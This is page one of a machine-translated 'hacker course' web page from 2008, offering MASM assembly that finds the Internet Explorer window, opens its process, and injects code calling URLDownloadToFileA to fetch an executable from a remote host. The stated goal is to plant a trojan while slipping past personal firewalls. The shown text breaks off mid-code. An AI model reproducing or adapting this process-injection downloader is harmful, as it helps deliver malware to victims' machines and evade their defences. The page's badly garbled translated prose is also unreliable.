Pours into the downloading document the code to the IE advancement then execution downloading docume

Add date: 07/23/2008 Publishing date: 07/23/2008 Hits: 1

Total 2 pages, Current page:1, Jump to page:

Under everybody possibly uses the homepage wooden horse to come the true EXE wooden horse, but some time
Back door quite big downloading time is frequently the homepage suspends perhaps the newspaper wrong (the CHM wooden horse often meets)
Therefore has written this procedure. . . .

Arranges reels off silk the parameter:
C:\masm32\BIN >type ii.bat
ml /c /coff i.asm
link /subsystem: windows i.obj

Tested a moment ago has been possible to run away another day net's application procedure against to ask that the network limits the Jinshan net dart also definitely not to have the question.

; #--------------------------------------# #
; # Injection downloadcode in IE --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# #

; test on win2k server sp4 masm8

.386
.model flat, stdcall
option casemap:none

include ../include/user32.inc
includelib ../lib/user32.lib
include ../include/kernel32.inc
includelib ../lib/kernel32.lib
include ../include/windows.inc

.data
hello db 'under 2K constructs the long-distance thread ', 0
tit db 'IEFrame',0
szFormat db 'PID is: %d',0
szBuffer dd 20 dup(0),0
pid dd 0
hProcess dd 0
hThread dd 0
pCodeRemote dd 0
path1 db 'c:\a.EXE ', 0

.const
szmsg db 'URLDownloadToFileA',0
userdll db 'Urlmon.dll',0
; szmsg db 'MessageBoxA',0
; userdll db 'User32.dll',0
szloadlib db 'LoadLibraryA',0; Attention and LoadLibraryW difference
kerdll db 'kernel32.dll',0

.code
codebegin:
dispdata db “http://192.168.0.5/NBTreeList.exe”, 0
szTit db “c:\a.exe”, 0
datalen =$-codebegin
Rproc proc msgbox; The MessageBoxA address is a parameter
CALL @F; push esi
@@:
POP EBX
SUB EBX, OFFSET @B
LEA ECX,[EBX+dispdata]
LEA EDX,[EBX+szTit]
push NULL
push 0
push edx
push ecx
push NULL
call msgbox
ret; Important
Rproc endp
codelen =$-codebegin; Word length xx byte

start:
; invoke FindWindow,0, offset tit; Returns calculator window handle
invoke FindWindow, offset tit,0
invoke GetWindowThreadProcessId, eax, offset pid; Computation machine program advancement PID number
; invoke wsprintf, offset szBuffer, offset szFormat, pid; Demonstrated PID with the decimal base
invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, pid; Opens the advancement, obtains the advancement handle
mov hProcess, eax; Preserved advancement handle

Other pages: : 1 * 2 * Next>>

Prev:The cross station script crack causes the browser kidnaps the attack

Next:The day discontinues the ASP receiving procedure crack

Comment:

Category: Home > hacker course